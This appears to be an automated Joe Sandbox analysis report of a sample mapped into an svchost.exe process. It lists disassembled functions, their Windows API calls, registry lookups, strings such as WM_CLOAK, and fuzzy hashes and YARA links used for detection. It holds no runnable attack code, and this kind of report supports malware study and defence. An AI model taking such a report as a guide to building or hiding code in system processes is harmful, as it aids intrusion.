                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                    • Opcode ID: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction ID: 6b027bd1f4a72286e53f060f334b72aa16e4232007e5c2ffe7824b42510e413c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bd40d97718a99176df0b2e4246046c8d9648a9c55502e0767320f63f5d8f3e5
                                                                                                                                                                    • Instruction Fuzzy Hash: 65F0AE76F007305ADB20F5694C88B9255989F877A1F155379FD4CEF3C8D6914801C291
                                                                                                                                                                    Function 03E34344 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 698 3e34344-3e34352 699 3e34354-3e3436b GetModuleFileNameA call 3e345d8 698->699 700 3e3437f-3e3438a 698->700 702 3e34370-3e34377 699->702 702->700 703 3e34379-3e3437c 702->703 703->700
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E34362
                                                                                                                                                                      • Part of subcall function 03E345D8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03E345F3
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E34611
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E3462F
                                                                                                                                                                      • Part of subcall function 03E345D8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03E3464D
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03E34696
                                                                                                                                                                      • Part of subcall function 03E345D8: RegQueryValueExA.ADVAPI32(?,03E34858,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03E346DC,?,80000001), ref: 03E346B4
                                                                                                                                                                      • Part of subcall function 03E345D8: RegCloseKey.ADVAPI32(?,03E346E3,00000000,00000000,00000005,00000000,03E346DC,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03E346D6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                                    • Opcode ID: 7da99163d140d08dce2798eac4622a11a75046096237bb5fc99d6a4447ad3200
                                                                                                                                                                    • Instruction ID: 3450363c493d8949796b4ef407379a7f4eeda095969460ade8ce891817312e4a
                                                                                                                                                                    • Opcode Fuzzy Hash: 7da99163d140d08dce2798eac4622a11a75046096237bb5fc99d6a4447ad3200
                                                                                                                                                                    • Instruction Fuzzy Hash: 80E06D71A003149BCB10EE6C88C8A8637E8AF0A654F441695ECA8DF28AD771DA208BD1
                                                                                                                                                                    Function 03E315E8 Relevance: 1.3, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 704 3e315e8-3e31639 705 3e31696-3e3169d 704->705 706 3e3163b-3e31652 705->706 707 3e3169f-3e316a6 705->707 708 3e31654-3e31658 706->708 709 3e3165a-3e31661 706->709 708->709 710 3e31663-3e31667 709->710 711 3e3166a-3e3166f 709->711 710->711 712 3e31671-3e31688 VirtualAlloc 711->712 713 3e31690-3e31694 711->713 712->713 714 3e3168a-3e3168e 712->714 713->705 714->707
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 03E31681
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction ID: 15a242daeecabba9c9b6c4620c09e0ce261fcfed26f05f326f864b721a90a25a
                                                                                                                                                                    • Opcode Fuzzy Hash: bf81a38576182df7ebedf42f44557afe8dfb248d6b9567118f4a5f62bd21eef2
                                                                                                                                                                    • Instruction Fuzzy Hash: CA21CDB464424ADFC750DF6CC884A9AB7F4FF89354B188A69F998CB344D330E954CB52
                                                                                                                                                                    Function 03E31520 Relevance: 1.3, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 715 3e31520-3e3154c 716 3e315b9-3e315c0 715->716 717 3e315c2-3e315cb 716->717 718 3e3154e-3e3155f 716->718 719 3e315de-3e315e5 717->719 720 3e315cd-3e315db 717->720 721 3e315b3-3e315b7 718->721 722 3e31561-3e3156c 718->722 720->719 721->716 722->721 723 3e3156e-3e31572 722->723 724 3e31574 723->724 725 3e31578-3e31586 723->725 724->725 726 3e31588 725->726 727 3e3158c-3e315a0 VirtualFree 725->727 726->727 728 3e315a2 727->728 729 3e315ac-3e315ae call 3e312c4 727->729 728->729 729->721
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(0000000C,00000000,00008000), ref: 03E31599
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction ID: 205db704243e856ae12d9a062ae26ee13aa184b55acd6f76f601bf270d85accf
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c42a345a70f0f3a1d6e030862cb05aa359eaaec3674c58177a49df2bd4ecf9d
                                                                                                                                                                    • Instruction Fuzzy Hash: CF21BF74604306AFC710EF19D888A4ABBE4FF89364F248A6DE59987350D331E850CB56
                                                                                                                                                                    Function 03E316A8 Relevance: 1.3, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 731 3e316a8-3e316f7 732 3e31751-3e31758 731->732 733 3e3175a-3e31761 732->733 734 3e316f9-3e3170f 732->734 735 3e31711-3e31715 734->735 736 3e31717-3e3171d 734->736 735->736 737 3e31725-3e31729 736->737 738 3e3171f-3e31723 736->738 739 3e3174b-3e3174f 737->739 740 3e3172b-3e3173f VirtualFree 737->740 738->737 739->732 740->739 741 3e31741 740->741 741->739
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,?,00004000), ref: 03E31738
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction ID: 0bf466703fd808e11e570db5f3c101d574df32e643fc97db47eebb45ffea732d
                                                                                                                                                                    • Opcode Fuzzy Hash: cddb50e74585b9630ee5e4e1119c29ccb3fce7b7018b50d9fa9e43f0702cbc30
                                                                                                                                                                    • Instruction Fuzzy Hash: E421E0B5204206DFC710DF2CD888A5AB7F4FF8A354B284A69E594CB344E331E905CB52

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 03E34400 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144stringlibraryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03E3441D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 03E3442E
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,kernel32.dll), ref: 03E34462
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 03E344D3
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll), ref: 03E3450E
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E34521
                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3452E
                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll), ref: 03E3453A
                                                                                                                                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 03E3456E
                                                                                                                                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 03E3457A
                                                                                                                                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 03E345A3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                    • Opcode ID: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction ID: 79fb2d045b02c34a9733473fbc26895133d7b1ae652e99dd2bffa1bba0448f8c
                                                                                                                                                                    • Opcode Fuzzy Hash: 283d0415bf49b11def31226ded9fcefcc571b1ca7e5e9ba35591a626a8ef72da
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A513A71D00259AFDF11EBE9CC88AEEB7F8AF46204F0516A5E155EB280D7749E40CF60
                                                                                                                                                                    Function 03E39304 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 27registryclipboardCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_POSCHANGED), ref: 03E39315
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_INIT_POS), ref: 03E39324
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_ROLLUP), ref: 03E39333
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_FREEMEMORY_NAME), ref: 03E39342
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_WM_STAYONTOP), ref: 03E39351
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessAttached), ref: 03E39360
                                                                                                                                                                    • RegisterClipboardFormatA.USER32(4tTray_ProcessDetached), ref: 03E3936F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClipboardFormatRegister
                                                                                                                                                                    • String ID: 4tTray_ProcessAttached$4tTray_ProcessDetached$4tTray_WM_FREEMEMORY_NAME$4tTray_WM_INIT_POS$4tTray_WM_POSCHANGED$4tTray_WM_ROLLUP$4tTray_WM_STAYONTOP
                                                                                                                                                                    • API String ID: 1228543026-747308701
                                                                                                                                                                    • Opcode ID: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction ID: 96a4dfdd5ec575b13a92e2223505367f1777117eb1bf4c02878bcc88f158423e
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d1210ef76ccf934e4cdaa0c724535f2d30dba7364cab90830ad57be92eb8d7c
                                                                                                                                                                    • Instruction Fuzzy Hash: 57F014B85403A89ED700FBB7784E6B936E4E7427117093359B5249B2A6D7B27800CF1A
                                                                                                                                                                    Function 03E37E9C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,03E38167,?,?,00000000,00000000), ref: 03E37ED2
                                                                                                                                                                      • Part of subcall function 03E36A94: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 03E36AB2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                    • Opcode ID: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction ID: ba6000db4c7e16c4790a8672612dfc45fe4da85a2aff895d6063b791e824576b
                                                                                                                                                                    • Opcode Fuzzy Hash: ca6b8d826501f5ea37fc452f6691c0ed617a45f5ef7ebba2f51404b0e50aa300
                                                                                                                                                                    • Instruction Fuzzy Hash: E8611F3870034CABDB00FBB4DC89AAF77B6EB8A200F60B665E1119F345DA35D909D755
                                                                                                                                                                    Function 03E39C74 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?), ref: 03E39CA7
                                                                                                                                                                    • GetProcAddress.KERNEL32(76680000,GetProcAddress), ref: 03E39CBC
                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll,?), ref: 03E39CD4
                                                                                                                                                                    • GetProcAddress.KERNEL32(767A0000,00000000), ref: 03E39CF6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                    • String ID: GetProcAddress$kernel32.dll$user32.dll
                                                                                                                                                                    • API String ID: 2574300362-2524697592
                                                                                                                                                                    • Opcode ID: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction ID: da4c9419a5ae2107a451a669a20ea18d98bcf1a671636ba59f743b4483bbd4c7
                                                                                                                                                                    • Opcode Fuzzy Hash: 1bf01c41d6a34c2e677c412de072975c7c30f8784e83284e957407d5c570d9f2
                                                                                                                                                                    • Instruction Fuzzy Hash: 47113C7490125CDFDB11FBA6D58D79CBBF4AB06704F9423D4E840A7245D3B4A941CF42
                                                                                                                                                                    Function 03E33B44 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21,03E3B330), ref: 03E33B7D
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?,03E3D630,?,?,03E3C0A8,03E34D21), ref: 03E33B83
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E,?,?,?), ref: 03E33B98
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,03E33BCC,00000002,03E3B330,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,03E3B330,00000000,?,03E33C0E), ref: 03E33B9E
                                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 03E33BBC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                    • Opcode ID: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction ID: 9bca6b6c119a3b56df426a33920d23ece6d2af7782d8e3ad63d3f085f783bf2d
                                                                                                                                                                    • Opcode Fuzzy Hash: 93593ecdef28ebde143931e9d8d9b751654bc97355a496fc6b97ecdb289dd6d7
                                                                                                                                                                    • Instruction Fuzzy Hash: B3F09664A8839879E630F2655E0EFDA267C5747F14F246309B2247C0CAC7B4C484CA65
                                                                                                                                                                    Function 03E3A600 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 245windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CallNextHookEx.USER32(?,?,?,?), ref: 03E3A63D
                                                                                                                                                                    • CallNextHookEx.USER32(00000000,?,?,?), ref: 03E3A655
                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 03E3A6B8
                                                                                                                                                                    • PostMessageA.USER32(?,0000001F,00000000,00000000), ref: 03E3A882
                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,?,000000F0,00000000,03E3A8FF,?,00000000,?,?,?,00000000,03E3A938), ref: 03E3A8AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallHookNext$LongMenuMessagePostSystemWindow
                                                                                                                                                                    • String ID: CabinetWClass
                                                                                                                                                                    • API String ID: 776588294-1981833947
                                                                                                                                                                    • Opcode ID: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction ID: 3c25c4954bbc90a7ffa1de2d6ebd178998cbca19f7419208a38add636fbaacf0
                                                                                                                                                                    • Opcode Fuzzy Hash: fdf74c5af3a33b01fd1b0657ed6913ecf56e064f815006f765946aa354b82c00
                                                                                                                                                                    • Instruction Fuzzy Hash: CFA1B039A00309EFDB14DF58D889EA9B7F5EF0A314F1596A0E985AB761C730E981CB10
                                                                                                                                                                    Function 03E3A36C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF), ref: 03E3A38F
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000,000000FF,000000FF), ref: 03E3A395
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000002C.00000002.20490578470.0000000003E31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 03E30000, based on PE: true
                                                                                                                                                                    • Associated: 0000002C.00000002.20490534969.0000000003E30000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490619150.0000000003E3C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 0000002C.00000002.20490664085.0000000003E3F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_44_2_3e30000_svchost.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CurrentSizeWorking
                                                                                                                                                                    • String ID: WM_CLOAK$WM_UNCLOAK
                                                                                                                                                                    • API String ID: 2122760700-2187480440
                                                                                                                                                                    • Opcode ID: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction ID: df02de288312bcef67ff7f9362bd9a113ec0bd6e7d4838c2643eb3b62c702b36
                                                                                                                                                                    • Opcode Fuzzy Hash: bacacd42f4fa91638426a15ad7b1be1379faebde21a8cd24b59e55e43a5ec49e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4421CC38604248DFCB10EB59D48DD5CB7F1AF0A314F65A7A1E852AB3A1D731ED81DB11
                                                                                                                                                                    Function 03E37198 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 03E37000: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03E3701C
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 03E37040
                                                                                                                                                                      • Part of subcall function 03E37000: GetModuleFileNameA.KERNEL32(03E30000,?,00000105), ref: 03E3705B
                                                                                                                                                                      • Part of subcall function 03E37000: LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 03E370FF
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 03E371CF
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 03E371EC
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E371F2
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E37207
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,03E3725C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 03E3720D
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFE8,?,00000040), ref: 03E3722F
